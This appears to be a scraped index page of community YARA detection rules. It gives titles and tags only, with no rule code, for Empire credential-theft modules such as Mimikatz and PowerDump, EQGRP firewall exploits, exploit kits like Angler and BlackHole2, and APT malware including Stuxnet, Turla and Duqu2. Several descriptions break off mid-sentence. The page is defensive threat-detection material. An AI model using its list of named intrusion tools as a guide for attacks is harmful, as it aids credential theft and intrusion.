Detects Empire component - from files Invoke-Portscan.ps1, Invoke-Portscan.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-PostExfil.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-PowerDump.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-PsExec.ps1

communitylateral-movement
Yara-Rules source

Detects Empire component - file Invoke-ShellcodeMSIL.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-SMBAutoBrute.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-SmbScanner.ps1

community
Yara-Rules source

Detects Empire component - file Invoke-SSHCommand.ps1

community
Yara-Rules source

Detects Empire component - file KeePassConfig.ps1

community
Yara-Rules source

Detects Empire component - from files KeePassConfig.ps1, KeePassConfig.ps1

community
Yara-Rules source

Detects Empire component - file Out-Minidump.ps1

community
Yara-Rules source

Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1

communitycredential-theft
Yara-Rules source

Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DCSync.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-PSInject.ps

communitycredential-theft
Yara-Rules source

Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1

communitycredential-theft
Yara-Rules source

Detects Empire component - from files Invoke-BypassUAC.ps1, Invoke-CredentialInjection.ps1, Invoke-CredentialInjection.ps1, Invoke-DCSync.ps1, Invoke-DllInjection.ps1, Invoke-Mimikatz.ps1, Invoke-PsEx

communitycredential-theftevasionlateral-movement
Yara-Rules source

Detects Empire component - from files Invoke-CredentialInjection.ps1, Invoke-PSInject.ps1, Invoke-ReflectivePEInjection.ps1

communitycredential-theft
Yara-Rules source

Detects Empire component - from files PowerUp.ps1, PowerUp.ps1

community
Yara-Rules source

Detects Empire component - file ReflectivePick_x64_orig.dll

community
Yara-Rules source

Detects Empire component - file PowerUp.ps1

community
Yara-Rules source

Detects Linux Dirty Cow Exploit - CVE-2012-0056 and CVE-2016-5195

communityexploit
Yara-Rules source

The YARA rule detects

community
Yara-Rules source

PassCV Malware mentioned in Cylance Report

community
Yara-Rules source

PassCV Malware mentioned in Cylance Report

community
Yara-Rules source

PassCV Malware mentioned in Cylance Report

community
Yara-Rules source

PassCV Malware mentioned in Cylance Report

community
Yara-Rules source

PassCV Malware mentioned in Cylance Report

community
Yara-Rules source

PassCV Malware mentioned in Cylance Report

community
Yara-Rules source

The PassCV_Sabre_Tool_NTScan rule detects the PassCV malware family, associated with targeted attacks on gaming companies, as

community
Yara-Rules source

Detects Windows discovery commands - known from OilRig Campaign

community
Yara-Rules source

Detects malware from OilRig Campaign

community
Yara-Rules source

Detects malware from OilRig Campaign

community
Yara-Rules source

Detects malware from OilRig Campaign

community
Yara-Rules source

Detects malware from OilRig Campaign

community
Yara-Rules source

Detects malware from OilRig Campaign

community
Yara-Rules source

Detects malware from OilRig Campaign

community
keyboy commands
yara low
Yara-Rules source

YARA rule: keyboy_commands

community
keyboy errors
yara low
Yara-Rules source

YARA rule: keyboy_errors

community
Yara-Rules source

YARA rule: keyboy_init_config_section

community
Yara-Rules source

YARA rule: keyboy_related_exports

community
Yara-Rules source

YARA rule: keyboy_systeminfo

community
Yara-Rules source

YARA rule: new_keyboy_export

community
Yara-Rules source

YARA rule: new_keyboy_header_codes

community
Yara-Rules source

EQGRP Toolset Firewall - RC5 / RC6 opcode

community
Yara-Rules source

EQGRP Toolset Firewall - file BananaAid

community
Yara-Rules source

EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130

community
Yara-Rules source

EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100

community
Yara-Rules source

EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BBANJO-3011.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BFLEA-2201.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BICECREAM-2140

community
Yara-Rules source

EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230

community
Yara-Rules source

EQGRP Toolset Firewall - file bo

community
Yara-Rules source

EQGRP Toolset Firewall - file BPATROL-2201.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BpfCreator-RHEL4

community
Yara-Rules source

EQGRP Toolset Firewall - file BPIE-2201.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BUSURPER-2211-724.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file BUSURPER-3001-724.exe

community
Yara-Rules source

EQGRP Toolset Firewall - Callback addresses

community
Yara-Rules source

EQGRP Toolset Firewall - file config_jp1_UA.pl

community
Yara-Rules source

EQGRP Toolset Firewall - file create_dns_injection.py

community
Yara-Rules source

EQGRP Toolset Firewall - file create_http_injection.py

community
Yara-Rules source

EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py

community
Yara-Rules source

EQGRP Toolset Firewall - file eligiblecandidate.py

community
Yara-Rules source

EQGRP Toolset Firewall - file EPBA.script

community
Yara-Rules source

EQGRP Toolset Firewall - file epicbanana_2.1.0.1.py

community
Yara-Rules source

EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py

community
Yara-Rules source

EQGRP Toolset Firewall - Extrabacon exploit output

communityexploit
Yara-Rules source

EQGRP Toolset Firewall - file hexdump.py

community
Yara-Rules source

EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, lpexe, writeJetPlow-2130

community
Yara-Rules source

EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, writeJetPlow-2130

community
Yara-Rules source

EQGRP Toolset Firewall - from files BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100

community
Yara-Rules source

EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120

community
Yara-Rules source

EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130

community
Yara-Rules source

EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130

community
Yara-Rules source

EQGRP Toolset Firewall - file jetplow.sh

community
Yara-Rules source

EQGRP Toolset Firewall - file MixText.py

community
Yara-Rules source

EQGRP Toolset Firewall - file networkProfiler_orderScans.sh

community
Yara-Rules source

EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit

community
Yara-Rules source

EQGRP Toolset Firewall - file payload.py

community
Yara-Rules source

EQGRP Toolset Firewall - file screamingplow.sh

community
Yara-Rules source

EQGRP Toolset Firewall - file SecondDate-2211.exe

community
Yara-Rules source

EQGRP Toolset Firewall - file shellcode.py

community
Yara-Rules source

EQGRP Toolset Firewall - file sniffer_xml2pcap

community
Yara-Rules source

EQGRP Toolset Firewall - from files sploit.py, sploit.py

community
Yara-Rules source

EQGRP Toolset Firewall - file sploit.py

community
Yara-Rules source

EQGRP Toolset Firewall - from files ssh.py, telnet.py

community
Yara-Rules source

EQGRP Toolset Firewall - file StoreFc.py

community
Yara-Rules source

EQGRP Toolset Firewall - from files tinyexec

community
Yara-Rules source

EQGRP Toolset Firewall - file tinyhttp_setup.sh

community
Yara-Rules source

EQGRP Toolset Firewall - file tunnel_state_reader

community
Yara-Rules source

EQGRP Toolset Firewall - file uninstallPBD.bat

community
Yara-Rules source

EQGRP Toolset Firewall - Unique strings

community
Yara-Rules source

EQGRP Toolset Firewall - file userscript.FW

community
Yara-Rules source

EQGRP Toolset Firewall - file workit.py

community
Yara-Rules source

The YARA rule 'install_get_persistent_filenames

community
Yara-Rules source

Detects tool from EQGRP toolset - file 1212.pl

community
Yara-Rules source

Detects tool from EQGRP toolset - from files 1212.pl, dehex.pl

community
Yara-Rules source

Detects tool from EQGRP toolset - file bc-genpkt

community
Yara-Rules source

Detects tool from EQGRP toolset - file bc-parser

community
Yara-Rules source

Detects tool from EQGRP toolset - file dn.1.0.2.1.linux

community
Yara-Rules source

Detects tool from EQGRP toolset - file durablenapkin.solaris.2.0.1.1

community
Yara-Rules source

The YARA rule 'EQGRP_false' detects

community
Yara-Rules source

Detects tool from EQGRP toolset - file installdate.pl

community
Yara-Rules source

Detects tool from EQGRP toolset - file morel.exe

community
Yara-Rules source

Detects tool from EQGRP toolset - file noclient-3.0.5.3

community
Yara-Rules source

Detects tool from EQGRP toolset - file teflondoor.exe

community
Yara-Rules source

Detects tool from EQGRP toolset - file teflonhandle.exe

community
Yara-Rules source

Detects malware from Project Sauron APT

aptcommunityproject_sauron
Yara-Rules source

The YARA rule APT_Project_Sauron_Custom_M2 detects malicious files associated with the Project S

aptcommunityproject_sauron
Yara-Rules source

Detects malicious files associated with the Project Sauron APT

aptcommunityproject_sauron
Yara-Rules source

Detects malware from Project Sauron APT

aptcommunityproject_sauron
Yara-Rules source

Detects malware from Project Sauron APT

aptcommunityproject_sauron
Yara-Rules source

The YARA rule 'APT_Project_Sauron_Custom

aptcommunityproject_sauron
Yara-Rules source

Detects strings from arping module - Project Sauron report by Kaspersky

communityproject_sauron
Yara-Rules source

Detects strings from basex module - Project Sauron report by Kaspersky

communityproject_sauron
Yara-Rules source

Detects strings from dext module - Project Sauron report by Kaspersky

communityproject_sauron
Yara-Rules source

Detects strings from kblogi module - Project Sauron report by Kaspersky

communityproject_sauron
Yara-Rules source

Detects scripts (mostly LUA) from Project Sauron report by Kaspersky

communityproject_sauron
Yara-Rules source

Detects string 'This cruft' often used in hack tools like netcat or cryptcat and also mentioned in Project Sauron report

community
Yara-Rules source

Auto-generated rule - from files 370c433dd61ec21d2677cfe02ef93a5f32a2b50d.codex, 5bf48d77bade79f2421ae3d258fe8262c043fb8f.codex, 08bdf374b28b234e824797145206f4df79eac6ea.codex

backdoorcommunity
Yara-Rules source

Auto-generated rule - from files 84b76d765e7357fa5402b5af97d351424a8edf03.codex, d0f90c1b3ebd79a816b5597a49ae8257df697591.codex, da24c17f75cf0b7d6c5ab01832a827ee4b4c52eb.codex

backdoorcommunity
Yara-Rules source

Auto-generated rule - file d4fe01ea13cf9926c2cf51d0ffbd78f9a110f4b9.codex

backdoorcommunity
Yara-Rules source

Auto-generated rule - file 2fb404bdcebc7acbeb598f8a2ddbecf48c60b113.codex

backdoorcommunity
Yara-Rules source

Auto-generated rule - file 5783b35b2eace55a5762df27fcb0b0fb28371b3e.codex

backdoorcommunity
Yara-Rules source

Auto-generated rule - file 7acb8d6d4c062c3097a7d31df103bc4d018519f9.codex

backdoorcommunity
Yara-Rules source

Detects Furtim Parent Malware

community
Yara-Rules source

Stuxnet Sample - file dll.dll

community
Yara-Rules source

Stuxnet Sample - file maindll.decrypted.unpacked.dll_

community
Yara-Rules source

The YARA rule detects a Stuxnet malware sample named *malware.exe* associated with targeted industrial espionage. SOC teams should deploy this rule in endpoint

community
Yara-Rules source

Stuxnet Sample - file 63e6b8136058d7a06dfff4034b4ab17a261cdf398e63868a601f77ddd1b32802

community
Yara-Rules source

Stuxnet Sample - file ~WTR4141.tmp

community
Yara-Rules source

Stuxnet Sample - file 0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198

community
Yara-Rules source

Stuxnet Sample - file s7hkimdb.dll

community
Yara-Rules source

Stuxnet Sample - file Copy of Shortcut to.lnk

community
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

The YARA rule 'blackhole2_htm6' detects files associated with the BlackHole2 Exploit Kit, which is used to deliver malware via exploit vectors like malicious HTML or JavaScript.

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole2 Exploit Kit Detection

communityexploit
Yara-Rules source

ZeroAccess Exploit Kit Detection

communityexploit
Yara-Rules source

ZeroAccess Exploit Kit Detection

communityexploit
Yara-Rules source

ZeroAccess Exploit Kit Detection

communityexploit
Yara-Rules source

The

communityexploit
Yara-Rules source

ZeroAccess Exploit Kit Detection

communityexploit
Yara-Rules source

ZeroAccess Exploit Kit Detection

communityexploit
Yara-Rules source

ZeroAccess Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

Angler Exploit Kit Detection

communityexploit
Yara-Rules source

BlackHole1 Exploit Kit Detection

communityexploit
Yara-Rules source

BleedingLife2 Exploit Kit Detection

communityexploit
Yara-Rules source

BleedingLife2 Exploit Kit Detection

communityexploit
Yara-Rules source

BleedingLife2 Exploit Kit Detection

communityexploit
Yara-Rules source

BleedingLife2 Exploit Kit Detection

communityexploit
Yara-Rules source

CrimePack Exploit Kit Detection

communityexploit
Yara-Rules source

CrimePack Exploit Kit Detection

communityexploit
Yara-Rules source

Eleonore Exploit Kit Detection

communityexploit
Yara-Rules source

This YARA rule detects malicious

communityexploit
Yara-Rules source

Eleonore Exploit Kit Detection

communityexploit
Yara-Rules source

Eleonore Exploit Kit Detection

communityexploit
Yara-Rules source

The 'eleonore_js2' YARA rule detects malicious

communityexploit
Yara-Rules source

Eleonore Exploit Kit Detection

communityexploit
Yara-Rules source

Fragus Exploit Kit Detection

communityexploit
Yara-Rules source

The

communityexploit
Yara-Rules source

Fragus Exploit Kit Detection

communityexploit
Yara-Rules source

Fragus Exploit Kit Detection

communityexploit
Yara-Rules source

Fragus Exploit Kit Detection

communityexploit
Yara-Rules source

Fragus Exploit Kit Detection

communityexploit
Yara-Rules source

The 'fragus_js2'

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

This Y

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Phoenix Exploit Kit Detection

communityexploit
Yara-Rules source

Sakura Exploit Kit Detection

communityexploit
Yara-Rules source

Sakura Exploit Kit Detection

communityexploit
Yara-Rules source

0x88 Exploit Kit Detection

communityexploit
Yara-Rules source

0x88 Exploit Kit Detection

communityexploit
Yara-Rules source

Zeus Exploit Kit Detection

communityexploit
Yara-Rules source

Detects Cozy Bear / Fancy Bear C2 Server IPs

community
Yara-Rules source

Detects a pagemgr.exe as mentioned in the CrowdStrike report

community
Yara-Rules source

Detects Sofacy Malware mentioned in PaloAltoNetworks APT report

aptcommunity
Yara-Rules source

Detects Sofacy Malware mentioned in PaloAltoNetworks APT report

aptcommunity
Yara-Rules source

Detects Sofacy Malware mentioned in PaloAltoNetworks APT report

aptcommunity
Yara-Rules source

Detects Furtim malware - file native.dll

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects sample mentioned in the Dubnium Report

community
Yara-Rules source

Detects Turla malware (based on sample used in the RUAG APT case)

aptcommunityturla
Yara-Rules source

Detects Turla malware (based on sample used in the RUAG APT case)

aptcommunityturla
Yara-Rules source

Detects Turla malware (based on sample used in the RUAG APT case)

aptcommunityturla
Yara-Rules source

Detects Turla malware (based on sample used in the RUAG APT case)

aptcommunityturla
Yara-Rules source

Detects a dropper from a CAB file mentioned in the article

community
Yara-Rules source

Detects trojan from APT report named http.exe

aptbackdoorcommunity
Yara-Rules source

Detects a malicious PotPlayer.dll

community
Yara-Rules source

Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks

community
Yara-Rules source

elknot/BillGates variants with an XOR-like C2 encryption scheme

community
Yara-Rules source

The "Contains_UserForm_Object" YARA

community
Yara-Rules source

Detect MIME MSO Base64 encoded ActiveMime file

community
Yara-Rules source

Detects Sofacy Fysbis Linux Backdoor_Naikon_APT_Sample1

aptbackdoorcommunity
Yara-Rules source

Detects Sofacy Fysbis Linux Backdoor

backdoorcommunity
Yara-Rules source

Detects Poseidon Group - Malicious Word Document

community
Yara-Rules source

Detects Poseidon Group - Malicious Word Document

community
Yara-Rules source

Detects Poseidon Group Malware

community
Yara-Rules source

Detects Codoso APT CustomTCP Malware

aptcommunity
Yara-Rules source

Codoso CustomTCP Malware

community
Yara-Rules source

Detects Codoso APT CustomTCP Malware

aptcommunity
Yara-Rules source

Detects Codoso APT CustomTCP Malware

aptcommunity
Yara-Rules source

Detects Codoso APT Gh0st Malware

aptcommunity
Yara-Rules source

Detects Codoso APT Gh0st Malware

aptcommunity
Yara-Rules source

Detects Codoso APT Gh0st Malware

aptcommunity
Yara-Rules source

Detects Codoso APT PGV PVID Malware

aptcommunity
Yara-Rules source

Detects Codoso APT PGV PVID Malware

aptcommunity
Yara-Rules source

Detects Codoso APT PGV PVID Malware

aptcommunity
Yara-Rules source

Detects Codoso APT PlugX Malware

aptcommunity
Yara-Rules source

Detects Codoso APT PGV PVID Malware

aptcommunity
Yara-Rules source

Detects Codoso APT PGV_PVID Malware

aptcommunity
Yara-Rules source

The YARA

aptcommunity
Yara-Rules source

Detects Codoso APT PlugX Malware

aptcommunity
Yara-Rules source

The YARA rule 'Codoso_Plug

aptcommunity
Yara-Rules source

Detects FakeM malware samples

community
Yara-Rules source

Detect a hidden PE file inside a sequence of numbers (comma separated)

backdoorcommunity
Yara-Rules source

The 'Contains_VBA_macro_code' rule detects MS Office documents containing embedded VBA macro code, commonly

community
Yara-Rules source

Auto-generated rule - from files 32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614, 3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2, 90ba78b6710462c2d97815e8745679942b3

backdoorcommunity
Yara-Rules source

Auto-generated rule - from files 7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094, b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a, edb16d3ccd50fc8f0f77d0875bf50a629fa

backdoorcommunity
Yara-Rules source

Detects the password of the backdoored DropBear SSH Server - BlackEnergy

backdoorcommunity
Yara-Rules source

Detects KillDisk malware associated with the BlackEnergy campaign, targeting critical infrastructure systems. Deploy this rule in endpoint EDR scanning, email gateway, and file share monitoring to identify and block malicious file execution and

community
Yara-Rules source

Detects KillDisk malware from BlackEnergy

community
Yara-Rules source

Detects VBS Agent from BlackEnergy Report - file Dropbearrun.vbs

community
Yara-Rules source

Detects DropBear SSH Server (not a threat but used to maintain access)

community
Yara-Rules source

Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll

community
Yara-Rules source

Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious

backdoorcommunity
Yara-Rules source

Detects Derusbi Kernel Driver

community
Yara-Rules source

Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)

backdoorcommunity
Yara-Rules source

Derusbi Driver version

community
Yara-Rules source

Derusbi Server Linux version

community
Yara-Rules source

Phishing Wave - file P-ORD-C-10156-124658.xls

communityphishing
Yara-Rules source

Phishing Wave - file p0o6543f.exe

communityphishing
Yara-Rules source

Detects Fareit Trojan from Sep/Oct 2015 Wave

backdoorcommunity
Yara-Rules source

Detects a Winnti malware - FWPKCLNT.SYS

community
Yara-Rules source

Detects a Winnti rootkit

community
Yara-Rules source

The YARA rule 'Winnti_malware_StreamPortal_Gen' detects instances of the Winnti malware family associated with the Streamportal campaign, leveraging indicators linked to malicious

community
Yara-Rules source

Detects a Winnti malware - Update.dll

community
Yara-Rules source

Detects a signing certificate used by the Winnti APT group

aptcommunity
Yara-Rules source

Search for an nss3.dll pattern indicating a hexed copy of Citadel malware built to work on Firefox > v23.0

community
Yara-Rules source

Yara rule related to hook.js, BeEF Browser hooking capability

community
Yara-Rules source

Detects WMI-based checks for virtual appliances (VM detection) used for sandbox evasion.

communityevasionwmi
Yara-Rules source

Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe

aptcommunity
Yara-Rules source

Detects malware by Chinese APT PLA Unit 78020 - Generic Rule

aptcommunity
Yara-Rules source

Detects malware by Chinese APT PLA Unit 78020 - Generic Rule

aptcommunity
Yara-Rules source

Detects malware associated with the Chinese APT group PLA Unit 78020, targeting systems with potential command-and-control or data exfiltration capabilities.

aptcommunity
Yara-Rules source

Iron Panda malware DnsTunClient - file named.exe

community
Yara-Rules source

Iron Panda Malware Htran

community
Yara-Rules source

Iron Panda Malware

community
Yara-Rules source

Iron Panda Malware

community
Yara-Rules source

Iron Panda Malware

community
Yara-Rules source

Iron Panda Malware

community
Yara-Rules source

Iron Panda Malware JSP

community
Yara-Rules source

Encoded Mimikatz in other file types

communitycredential-theft
Carbanak Malware
yara high
Yara-Rules source

Carbanak Malware

community
Carbanak Malware
yara high
Yara-Rules source

Carbanak Malware

community
Carbanak Malware
yara high
Yara-Rules source

Carbanak Malware

community
Yara-Rules source

Identify DiamondFox

community
Detects Emdivi Malware
yara critical
Yara-Rules source

The Y

community
Detects Emdivi Malware
yara critical
Yara-Rules source

Detects Emdivi Malware

community
Detects Emdivi Malware
yara critical
Yara-Rules source

Detects Emdivi Malware

community
Detects Emdivi Malware
yara critical
Yara-Rules source

Detects Emdivi Malware

community
Yara-Rules source

The Emdivi_SFX

community
Yara-Rules source

Rule to detect Korplug/PlugX FAST variant

community
Yara-Rules source

Auto-generated rule - file ec41b029c3ff4147b6a5252cb8b659f851f4538d4af0a574f7e16bc1cd14a300

backdoorcommunity
Yara-Rules source

Auto-generated rule - from files 32159d2a16397823bc882ddd3cd77ecdbabe0fde934e62f297b8ff4d7b89832a, 63735d555f219765d486b3d253e39bd316bbcb1c0ec595ea45ddf6e419bef3cb

backdoorcommunity
Yara-Rules source

Auto-generated rule - file dc18850d065ff6a8364421a9c8f9dd5fcce6c7567f4881466cee00e5cd0c7aa8

backdoorcommunity
Yara-Rules source

Threat Group 3390 APT Sample - HttpBrowser RAT Dropper

aptbackdoorcommunity
Yara-Rules source

This YARA rule detects a dropper associated with Threat Group 33

aptbackdoorcommunity
Yara-Rules source

Detect

aptbackdoorcommunity
Yara-Rules source

Threat Group 3390 APT Sample - HttpBrowser RAT Sample update.hancominc.com

aptbackdoorcommunity
Yara-Rules source

Threat Group 3390 APT Sample - HttpBrowser RAT Sample

aptbackdoorcommunity
Yara-Rules source

The PlugX_NvSmartMax_Gen YARA rule detects samples

aptcommunity
Yara-Rules source

sphinx moth threat group file cudacrt.dll

community
Yara-Rules source

sphinx moth threat group file h2t.dat

community
Yara-Rules source

sphinx moth threat group file iastor32.exe

community
Yara-Rules source

sphinx moth threat group file kerberos32.dll

community
Yara-Rules source

sphinx moth threat group file kerberos64.dll

community
Yara-Rules source

sphinx moth threat group file nvcplex.dat

community
Yara-Rules source

Threat Group 3390 APT - C2 Server

aptcommunity
Yara-Rules source

The ThreatGroup3390_Strings rule detects indicators associated with the Threat Group 3390 APT, including hardcoded credentials, C2 domains, and malicious strings used in their campaigns. SOC teams should deploy this rule in endpoint EDR scanning, email gateway

aptcommunity
Yara-Rules source

Apolmy Privilege Escalation Trojan used in APT Terracotta

aptbackdoorcommunity
Yara-Rules source

Liudoor Trojan used in Terracotta APT

aptbackdoorcommunity
Yara-Rules source

Liudoor Trojan used in Terracotta APT

aptbackdoorcommunity
Yara-Rules source

The Mithozhan_Trojan YARA rule detects the Mithozhan malware, associated with the APT Terrac

aptbackdoorcommunity
Yara-Rules source

The RemoteExec_Tool YARA rule detects a Remote Access Tool linked to the A

aptcommunity
Yara-Rules source

Exploit Sample CVE-2015-5119

communityexploit
cve 2013 0074
yara low
Yara-Rules source

YARA rule: cve_2013_0074

community
Yara-Rules source

Detects Liudoor daemon backdoor

backdoorcommunity
Yara-Rules source

Detects CloudDuke Malware

community
Yara-Rules source

Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe

aptcommunity
Yara-Rules source

MS15-078 / MS15-077 exploit - generic signature

communityexploit
Yara-Rules source

MS15-078 / MS15-077 exploit - Hacking Team code

communityexploit
Yara-Rules source

Dropped File - 1.vbs

community
Yara-Rules source

SFX with voicemail content

community
Yara-Rules source

SFX with adobe.exe content

community
Yara-Rules source

MiniDionis Malware - file readerView.exe / adobe.exe

community
Yara-Rules source

Drop binary as base64 encoded cert trick

community
Yara-Rules source

SeaDuke Malware - file 3eb86b7b067c296ef53e4857a74e09f12c2b84b666fc130d1f58aec18bc74b0d

community
Yara-Rules source

Wild Neutron APT Sample Rule - from files 683f5b476f8ffe87ec22b8bab57f74da4a13ecc3a5c2cbf951999953c2064fc9, 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92, 8ca7ed720babb32a6f381769ea

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 1d3bdabb350ba5a821849893dabe5d6056bf7ba1ed6042d93174ceeaa5d6dad7

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 1604e36ccef5fa221b101d7f043ad7f856b84bf1a80774aa33d91c2a9a226206

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 4bd548fe07b19178281edb1ee81c9711525dab03dc0b6676963019c44cc75865

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file a14d31eb965ea8a37ebcc3b5635099f2ca08365646437c770212d534d504ff3c

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 758e6b519f6c0931ff93542b767524fc1eab589feb5cfc3854c77842f9785c92

aptcommunity
Yara-Rules source

Wild Neutron APT Sample Rule - file 781eb1e17349009fbae46aea5c59d8e5b68ae0b42335cb035742f6b0f4e4087e

aptcommunity
Yara-Rules source

Hacking Team Disclosure Sample - file ndisk.sys

community
Yara-Rules source

Hacking Team Disclosure Sample - file elevator.dll

community
Yara-Rules source

Hacking Team Disclosure Sample - file elevator.exe

community
Yara-Rules source

Elise Backdoor Trojan

backdoorcommunity
Yara-Rules source

Operation Clandestine Wolf signature based on OSINT from 06.23.15

backdoorcommunity
Yara-Rules source

Backdoor Win64 Winnti Pharma

backdoorcommunity
Yara-Rules source

Sofacy Bundestags APT Batch Script

aptcommunity
Yara-Rules source

Sofacy Group Malware Sample 2

community
Yara-Rules source

Sofacy Group Malware Sample 3

community
Yara-Rules source

Winexe tool used by Sofacy group in Bundestag APT

aptcommunity
Yara-Rules source

Kaspersky APT Report - Duqu2 Sample - file d8a849654ab97debaf28ae5b749c3b1ff1812ea49978713853333db48c3972c3

aptcommunitykaspersky_duqu2
Yara-Rules source

Kaspersky APT Report - Duqu2 Sample - Malicious MSI

aptcommunitykaspersky_duqu2
Yara-Rules source

Kaspersky APT Report - Duqu2 Sample - file 2a9a5afc342cde12c6eb9a91ad29f7afdfd8f0fb17b983dcfddceccfbc17af69

aptcommunitykaspersky_duqu2
Yara-Rules source

